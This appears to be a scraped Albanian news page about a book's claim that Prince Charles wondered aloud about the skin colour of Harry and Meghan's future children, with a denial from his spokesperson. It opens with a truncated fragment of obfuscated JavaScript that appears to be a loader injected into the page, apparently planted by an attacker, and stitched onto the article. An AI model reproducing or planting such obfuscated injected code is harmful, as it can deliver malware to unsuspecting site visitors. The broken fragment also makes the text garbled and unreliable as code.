;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

A e shkaktoi përçarjen Princi Charles mes Meghan dhe familjes mbretërore?

By

Një libër i ri pretendon se Princi Charles spekuloi për ngjyrën e lëkurës së fëmijëve të ardhshëm të Princit Harry dhe Meghan Markle dhe padashur shkaktoi përçarjen midis çiftit dhe familjes mbretërore britanike.

Kjo është sipas një burimi në librin e autorit Christopher Andersen “Brothers And Wives: Inside The Private Lives of William, Kate, and Meghan,” që doli të martën.

Burimi raportoi se më 27 nëntor 2017 në të njëjtin mëngjes u shpall zyrtarisht fejesa e Princit Harry dhe Meghan Markle ,ndërsa princi Charles i tha gruas së tij, Camilla, “Pyes veten se si do të duken fëmijët?”

Burimi tha se Camilla ishte “disi e befasuar” nga pyetja dhe u përgjigj: “Epo, absolutisht të mrekullueshëm, jam e sigurt”.

Duke ulur zërin, Charles pyeti: “Dua të them, si mendoni se mund të jetë çehrja e fëmijëve të tyre?”

Një zëdhënës i Princit Charles tha për The Post: “Ky është trillim dhe nuk ia vlen të komentohet më tej”.

Në intervistën e marsit me Oprah Winfrey, Meghan tha se kishte “shqetësime rreth bisedave që janë bërë rreth asaj se sa e errët mund të ishte lëkura e djalit të Harryt, Archie kur ai lindi… Këto ishin biseda që familja kishte me Harry-n”.

Autori e paraqet çështjen sikur kurioziteti i Charles u kap dhe u shtrembërua nga oborrtarët mashtrues, të cilët i dhanë një spikamë racist. Sipas Andersen, në kohën kur kjo u dëgjua nga Harry dhe Meghan, ajo kishte arritur përmasa toksike.

Libri zbulon gjithashtu zhgënjimin e Harryt pasi ai u ankua te Charles, i cili, sipas një burimi tjetër të brendshëm, i tha princit se ishte “shumë i ndjeshëm për këtë çështje”.

Këtë pikëpamje josimpatike e ndau William, i cili dyshohet se e quajti komentin e lëkurës “pa takt”, por “jo një shenjë racizmi brenda familjes”.

Pas intervistës së Harry dhe Meghan, princi u shpreh publikisht: “Ne nuk jemi një familje raciste,” u tha ai gazetarëve.

Artikuj të ngjashëm